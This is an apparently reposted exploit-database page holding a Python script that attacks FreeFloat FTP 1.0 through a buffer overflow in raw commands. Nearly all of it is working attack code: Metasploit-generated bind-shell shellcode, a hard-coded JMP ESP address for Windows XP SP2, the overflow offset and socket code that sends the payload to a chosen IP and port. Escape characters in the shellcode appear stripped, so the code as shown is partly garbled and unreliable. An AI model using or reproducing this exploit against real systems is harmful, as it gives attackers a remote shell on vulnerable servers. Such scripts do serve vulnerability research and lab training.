Home / exploits FreeFloat FTP 1.0 Buffer Overflow
Posted on 12 February 2013
#!/usr/bin/env python # Exploit Title: FreeFloat FTP raw commands buffer overflow # Date: 10 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.freefloat.com/ # Version: FreeFloat FTP 1.0 # Tested on: Windows XP Pro SP2, English # # Description: # FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and # execute arbitrary code when a long and invalid raw command is sent to it. # import socket, struct, sys if len(sys.argv) < 3: print "usage: %s IP port" % (sys.argv[0]) sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) # Bind shellcode generated with msfvenom: # msfvenom -p windows/shell_bind_tcp # -b "x00x0ax0bx27x36xcexc1x04x14x3ax44xe0x42xa9x0d" # -e x86/fnstenv_mov # # [*] x86/fnstenv_mov succeeded with size 366 (iteration=1) shellcode = ( "x6ax56x59xd9xeexd9x74x24xf4x5bx81x73x13xc8" + "x4cxabx8cx83xebxfcxe2xf4x34xa4x22x8cxc8x4c" + "xcbx05x2dx7dx79xe8x43x1ex9bx07x9ax40x20xde" + "xdcxc7xd9xa4xc7xfbxe1xaaxf9xb3x9ax4cx64x70" + "xcaxf0xcax60x8bx4dx07x41xaax4bx2axbcxf9xdb" + "x43x1exbbx07x8ax70xaax5cx43x0cxd3x09x08x38" + "xe1x8dx18x1cx20xc4xd0xc7xf3xacxc9x9fx48xb0" + "x81xc7x9fx07xc9x9ax9ax73xf9x8cx07x4dx07x41" + "xaax4bxf0xacxdex78xcbx31x53xb7xb5x68xdex6e" + "x90xc7xf3xa8xc9x9fxcdx07xc4x07x20xd4xd4x4d" + "x78x07xccxc7xaax5cx41x08x8fxa8x93x17xcaxd5" + "x92x1dx54x6cx90x13xf1x07xdaxa7x2dxd1xa0x7f" + "x99x8cxc8x24xdcxffxfax13xffxe4x84x3bx8dx8b" + "x37x99x13x1cxc9x4cxabxa5x0cx18xfbxe4xe1xcc" + "xc0x8cx37x99xfbxdcx98x1cxebxdcx88x1cxc3x66" + "xc7x93x4bx73x1dxc5x6cxbdx13x1fxc3x8exc8x5d" + "xf7x05x2ex26xbbxdax9fx24x69x57xffx2bx54x59" + "x9bx1bxc3x3bx21x74x54x73x1dx1fxf8xdbxa0x38" + "x47xb7x29xb3x7exdbx41x8bxc3xf9xa6x01xcax73" + "x1dx24xc8xe1xacx4cx22x6fx9fx1bxfcxbdx3ex26" + "xb9xd5x9exaex56xeax0fx08x8fxb0xc9x4dx26xc8" + "xecx5cx6dx8cx8cx18xfbxdax9ex1axedxdax86x1a" + "xfdxdfx9ex24xd2x40xf7xcax54x59x41xacxe5xda" + "x8exb3x9bxe4xc0xcbxb6xecx37x99x10x7cx7dxee" + "xfdxe4x6exd9x16x11x37x99x97x8axb4x46x2bx77" + "x28x39xaex37x8fx5fxd9xe3xa2x4cxf8x73x1dx4c" + "xabx8c" ) # EIP overwritten at offset 251 # JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English jmpesp = struct.pack("<I", 0x7CA58265) buf = "x41" * 251 + jmpesp + "x90" * 129 + shellcode print "[+] exploiting target %s:%d" % (ip, port) print "[+] try connecting to %s on port 4444" % (ip) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.recv(1024) s.send(buf + " ")
